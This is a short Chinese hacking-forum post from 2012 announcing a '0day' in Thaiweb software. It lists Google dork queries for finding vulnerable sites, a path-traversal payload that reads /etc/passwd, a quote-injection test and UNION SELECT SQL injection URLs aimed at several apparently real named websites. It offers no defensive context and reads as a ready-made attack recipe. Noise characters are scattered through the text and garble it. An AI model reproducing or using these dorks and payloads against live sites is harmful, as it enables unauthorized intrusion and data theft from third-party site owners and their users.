中国网络渗透测试联盟

标题: Thaiweb远程文件sql注入漏洞0day [打印本页]
作者: admin    时间: 2012-12-27 08:38
标题: Thaiweb远程文件sql注入漏洞0day
Google之:3 I4 w2 c2 ?. d8 V4 O

2 c; D: [( r; k1 b1 \intext:powered by Thaiweb
9 {! a2 i: C6 u4 W, T$ n5 g
6 V) i/ ~( i& `* [) Einurl:index.php?page=board.php4 O) V7 F/ `. g- ^; z

) s3 Q% i% R+ |' o& U) p
1 l$ @, ?) d) @0 Y9 f8 }+ s% U  f* i. V
利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd' x9 L  R9 j' g1 W" I' c

# ?* s9 y) e3 Y5 K  a: w  w$ B
+ k8 i) Z, K/ a6 `  Z3 y, O
6 x( W9 O* q+ B  F利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'' B# `+ u! g0 [0 M  K) ^

: c: y9 I6 L- a* d! e
; o5 T  D/ D" m3 {9 T
; D. z! d+ i9 U8 }7 jhttp://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
8 J9 a4 @6 D2 m2 b' W' l: R% g* ^+ l9 V5 n5 L; A% g
http://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
5 B' e' w0 p& D5 c* g - c4 z/ k: ?7 |
http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--! S7 V0 j$ C% {  A. s4 c' m




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2